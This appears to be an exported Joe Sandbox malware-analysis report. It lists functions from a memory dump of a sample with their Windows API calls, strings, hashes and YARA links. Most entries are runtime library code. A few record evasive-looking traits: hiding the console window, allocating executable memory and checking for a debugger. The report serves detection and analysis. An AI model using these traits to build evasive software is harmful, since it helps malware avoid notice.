Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: AddressConsoleHandleModuleProc$CurrentFreeThreadWindow
String ID: FreeConsole$ShowWindow$kernel32.dll$user32.dll
API String ID: 245968307-4003964729
Opcode ID: dcf74aaf7e87b770bce942b8280388f1a86c5cfd9e92d45eca0593a71b711f24
Instruction ID: b774038d673d36bb4d00abb66efad2605a79bca8640de7ff5553abea5502d5ee
Opcode Fuzzy Hash: dcf74aaf7e87b770bce942b8280388f1a86c5cfd9e92d45eca0593a71b711f24
Instruction Fuzzy Hash: 5F11BF75E40704ABDB01EBB5AD09B9EBBE8EB49711F104535F411EE282EB71B9008AA1

Function 00336494 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,003365A1,?,?,00000001,00000000,?,?,0033680B,00000021,FlsSetValue,003494CC,003494D4,00000001), ref: 00336555

Strings

ext-ms-, xrefs: 003364FF
api-ms-, xrefs: 003364EB

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6ce896e295bbfe0ca65e6dd5c88c56ed75aff0ce9c49d153a7bde3894c869395
Instruction ID: ca0c78e390b2c9d84f561816a0bbbf79f96b222c001eaec8982555bf5d480e33
Opcode Fuzzy Hash: 6ce896e295bbfe0ca65e6dd5c88c56ed75aff0ce9c49d153a7bde3894c869395
Instruction Fuzzy Hash: 7B21A536A01651BFEB239B25ECD6A5A376CDB43760F254130E906AB295DB30FE00C6D4

Function 00344000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0034406A
std::_Throw_Cpp_error.LIBCPMT ref: 003440A5
std::_Throw_Cpp_error.LIBCPMT ref: 003440AC
std::_Throw_Cpp_error.LIBCPMT ref: 003440B3
std::_Throw_Cpp_error.LIBCPMT ref: 003440BA

Strings

Success created., xrefs: 00344003

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID: Success created.
API String ID: 2261580123-2637490038
Opcode ID: 370b849e87729c3750731d82d10f0c2a281935e134d6112d4badeeed27c0f090
Instruction ID: 64df9ea00ef69bd1363b53492cfb4e16c1a93497c14e1c599adbb1b2ffe2f60c
Opcode Fuzzy Hash: 370b849e87729c3750731d82d10f0c2a281935e134d6112d4badeeed27c0f090
Instruction Fuzzy Hash: A811CA71740B21AAE3333BB06D07B57B5C4AF10B41F114838FB45AE5C2E9B1F5208762

Function 0032E516 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_0000E3BA,00000000,?,?), ref: 0032E55F
GetLastError.KERNEL32 ref: 0032E56B
__dosmaperr.LIBCMT ref: 0032E572

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: cdda64fed17df8bfecf0bfe23f08ce9b9f7502d54febfa3094c86999204bfdd5
Instruction ID: cd4b23c655885a0cbf3974c94715b0dc5711d75b022a7f10739321b58f4e58ba
Opcode Fuzzy Hash: cdda64fed17df8bfecf0bfe23f08ce9b9f7502d54febfa3094c86999204bfdd5
Instruction Fuzzy Hash: 2201B576910129AFDF17DFA1EC06ADF7BA9EF01324F100068F9019A150EB70DD50D790

Function 00338A6D Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003381B7: GetConsoleOutputCP.KERNEL32(BB9BFA91,00000000,00000000,00000000), ref: 0033821A

WriteFile.KERNEL32(?,00000000,?,0034F498,00000000,0000000C,00000000,00000000,?,00000000,0034F498,00000010,00330642,00000000,00000000,00000000), ref: 00338BD6
GetLastError.KERNEL32(?,00000000), ref: 00338BE0

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 0503d3a5367b5519b86005f57cc7481a012c4306d7862cf448e47afd69109cae
Instruction ID: 7644f996b7f3d6650377d5a4b13872159d2df61383496b676139cf51a5f1f53d
Opcode Fuzzy Hash: 0503d3a5367b5519b86005f57cc7481a012c4306d7862cf448e47afd69109cae
Instruction Fuzzy Hash: 92619FB1D04249AFDF168FA8C8C4AEEBBB9EF09314F154595F800AB252DB71D946CB60

Function 00344BD0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00344C66

Strings

@$N, xrefs: 00344C91

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: AllocVirtual
String ID: @$N
API String ID: 4275171209-4015512035
Opcode ID: d9825f412dbf1ea9bc67126bfb8259b2a4f79340171b2c9b175ad72eeea8e727
Instruction ID: c4845a9c7094a32a8d82807ad12f30a67ddc3dbd5db305c9dbb077fc0f3d3b43
Opcode Fuzzy Hash: d9825f412dbf1ea9bc67126bfb8259b2a4f79340171b2c9b175ad72eeea8e727
Instruction Fuzzy Hash: BD319475E002189BDB06DF68EC81BEEB7F4EF19304F144169E904BF282EB75AE548764

Function 0033866F Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00338BBC,00000000,00000000,00000000,?,0000000C,00000000), ref: 0033870B
GetLastError.KERNEL32(?,00338BBC,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0034F498,00000010,00330642,00000000,00000000), ref: 00338731

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: ac08af984e72c0567fe45c71a76a6d4da6d0720ad41b86c8086041927e886922
Instruction ID: ac8a788e4eaafa60ad102cdaff64caab6b824809b5b11f9d79424176b4d2bc05
Opcode Fuzzy Hash: ac08af984e72c0567fe45c71a76a6d4da6d0720ad41b86c8086041927e886922
Instruction Fuzzy Hash: 6A218035A002199BCB16CF29DDC09D9B7BAEF49305F2440AAEA06D7211DA30EE46CB64

Function 00336182 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003361CE
GetFileType.KERNELBASE(00000000), ref: 003361E0

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 144610570b429ce0b085636d84b93914bde3f141e27b0498f735230c6ff1d406
Instruction ID: 9e8fd86324c868331672349cea864ad28d2dd4298485a68fd5ecca33bef8afd4
Opcode Fuzzy Hash: 144610570b429ce0b085636d84b93914bde3f141e27b0498f735230c6ff1d406
Instruction Fuzzy Hash: B1118731904B416EC7324A3EDCCA5277E989B56330F3A4B19D5B7C65F2C734D886D254

Function 0032E3BA Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(0034F048,0000000C), ref: 0032E3CD
ExitThread.KERNEL32 ref: 0032E3D4

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 64f295dc90d58f108534cae2a768c6f552c953cdabf42f64c11c1e0ee7a0b383
Instruction ID: cb0ad9c6d6e89c037f130cb26706a4b5da6638aaa363c69f128d20f5049271e7
Opcode Fuzzy Hash: 64f295dc90d58f108534cae2a768c6f552c953cdabf42f64c11c1e0ee7a0b383
Instruction Fuzzy Hash: C4F0AF79900610AFDB13ABB0D88BA6E3B68EF42301F204159F4019F262CF74A941CBA1

Function 00334F0C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0033C57D,?,00000000,?,?,0033C81E,?,00000007,?,?,0033CD17,?,?), ref: 00334F22
GetLastError.KERNEL32(?,?,0033C57D,?,00000000,?,?,0033C81E,?,00000007,?,?,0033CD17,?,?), ref: 00334F2D

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 76b0d742718899f17e42b0c50729a9f5c5434060215041b2ce699ccc6aa5cc7d
Instruction ID: 4027c9b31fdfdb9d899b426b821a7491f8642b9f2273c4820679fd338acc97ef
Opcode Fuzzy Hash: 76b0d742718899f17e42b0c50729a9f5c5434060215041b2ce699ccc6aa5cc7d
Instruction Fuzzy Hash: CEE0EC3A504A14ABDB236BA5BC49B9A3BACEB41755F150070F60CAE162DF74A8908798

Function 0032625D Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0336dc79c516c65eb876782c4ee32bbc8bf182388b4047676f91ea215d056087
Instruction ID: 8eabf007bcb1e2d0c55268e3674b4ce76abb3f0cf7f56bf0332acac23136548b
Opcode Fuzzy Hash: 0336dc79c516c65eb876782c4ee32bbc8bf182388b4047676f91ea215d056087
Instruction Fuzzy Hash: B531D83690012AEFCF16CF64E9919EDB7B9BF09320B144259E601E76A0E731FD44CB90

Function 0033655F Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5125ef17b7f3ee632ec62939e71603b083e7f6ddb6aff3bfce2e22da44aba68
Instruction ID: 0326759f062fde1395ef53933fa24d27fe5dbb430e813a826fb3fa30b7c5ac63
Opcode Fuzzy Hash: c5125ef17b7f3ee632ec62939e71603b083e7f6ddb6aff3bfce2e22da44aba68
Instruction Fuzzy Hash: C9019E37700625BFAB178F69ECC295A33DAAB86370B258130F901CF59ADA70DC118790

Non-executed Functions

Function 0033E8C8 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0033EAAC

Strings

1#SNAN, xrefs: 0033E9D4
1#IND, xrefs: 0033E9CD
1#INF, xrefs: 0033E9FE
1#QNAN, xrefs: 0033E9DB

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7d30f17661a6a17ec1501d8a6426274a044ebfc63c4b0c4f7d9986cf43ed813c
Instruction ID: 1459a5c99a07eb03b9134302b6b689dd1374af4620432891a3e280545f9da5f5
Opcode Fuzzy Hash: 7d30f17661a6a17ec1501d8a6426274a044ebfc63c4b0c4f7d9986cf43ed813c
Instruction Fuzzy Hash: BFD22A71E082298FDB66CF28DD807EAB7B9EB44305F5541EAD44DE7240DB78AE818F41

Function 0033DD28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0033E046,00000002,00000000,?,?,?,0033E046,?,00000000), ref: 0033DDC1
GetLocaleInfoW.KERNEL32(?,20001004,0033E046,00000002,00000000,?,?,?,0033E046,?,00000000), ref: 0033DDEA
GetACP.KERNEL32(?,?,0033E046,?,00000000), ref: 0033DDFF

Strings

ACP, xrefs: 0033DD46
OCP, xrefs: 0033DD7C

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 829ee50e64cecc8a38a850dd0fec4eee1e6f1f36dc39955630aa3dc562f6463d
Instruction ID: b99d20a7e6aef07dd8f159662dad7aafdef80f26975a15ac60b3cd8576fed630
Opcode Fuzzy Hash: 829ee50e64cecc8a38a850dd0fec4eee1e6f1f36dc39955630aa3dc562f6463d
Instruction Fuzzy Hash: D021AF66A00100AADB379F19F980A9777AAEF50B60F578064E90ADF504E732DE40C390

Function 0033DEFD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0033E009
IsValidCodePage.KERNEL32(00000000), ref: 0033E052
IsValidLocale.KERNEL32(?,00000001), ref: 0033E061
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0033E0A9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0033E0C8

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 42b8010627dbb5d13ac81359e3815ca8e33ae7b6df048ef54794f33d8f6549d7
Instruction ID: f7ed396191eaca275d6c0cb8210f2a4e67692349554dc979fb5453946b912509
Opcode Fuzzy Hash: 42b8010627dbb5d13ac81359e3815ca8e33ae7b6df048ef54794f33d8f6549d7
Instruction Fuzzy Hash: 00518175A00609AFDF16DFA5DCC1AAE77B8BF09701F054425F911EF191EBB0A9408B61

Function 0033D599 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetACP.KERNEL32(?,?,?,?,?,?,00332903,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0033D65A
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00332903,?,?,?,00000055,?,-00000050,?,?), ref: 0033D685
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0033D7E8

Strings

utf8, xrefs: 0033D757

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 984c8166cfe3b04793941a1d92fbcc806fb80274246f6fc607a7e497bd234496
Instruction ID: 4dc78734e5d9e713c91161c46b8ce8ebe7164406d0609cf8dd8c3ed4734c6aa9
Opcode Fuzzy Hash: 984c8166cfe3b04793941a1d92fbcc806fb80274246f6fc607a7e497bd234496
Instruction Fuzzy Hash: 8771F275A00602AADB27AF74ECC3BAA77ACEF45700F15442AF519DF181EB74E940C7A1

Function 00335289 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00335316

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction ID: ab35b1034824e512d5daa388e3e466996bc53aa6cfac25b46db5d150db965a2c
Opcode Fuzzy Hash: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction Fuzzy Hash: B6B15772E04A459FEB178F28C8C17FEBBE5EF55350F15816AE802AB341D274AD41CBA0

Function 0033AAC7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0033ABB7
FindNextFileW.KERNEL32(00000000,?), ref: 0033ACAB
FindClose.KERNEL32(00000000), ref: 0033ACEA
FindClose.KERNEL32(00000000), ref: 0033AD1D

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 33ea0417ca80e9f1a06adf4469d9e363f946c19c0a6aa19b087e69c55c8f9ad7
Instruction ID: e092e6c1b765096f9a329492593f6cde857655c9d9558a214fccc69834b01ec6
Opcode Fuzzy Hash: 33ea0417ca80e9f1a06adf4469d9e363f946c19c0a6aa19b087e69c55c8f9ad7
Instruction Fuzzy Hash: 637105719059585FDF22EF24CCD9AAEBBB9AF45300F1441D9E089EB211DB345E84DF11

Function 00327CC9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00327CD5
IsDebuggerPresent.KERNEL32 ref: 00327DA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00327DBA
UnhandledExceptionFilter.KERNEL32(?), ref: 00327DC4

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7a27021e271774154ad9f4fe0b3f645f061f2026b3c5324c486b39da230d1d77
Instruction ID: b7bc3641e8b0de7d614207ad0c349e874940019ea324110246e8d10223259b91
Opcode Fuzzy Hash: 7a27021e271774154ad9f4fe0b3f645f061f2026b3c5324c486b39da230d1d77
Instruction Fuzzy Hash: 1831DC75D052299BDF21DF64E9497CDBBB8BF08304F1041DAE40CAB251EB715A84CF95

Function 0033D9AC Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033DA00
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033DA4A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033DB10

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

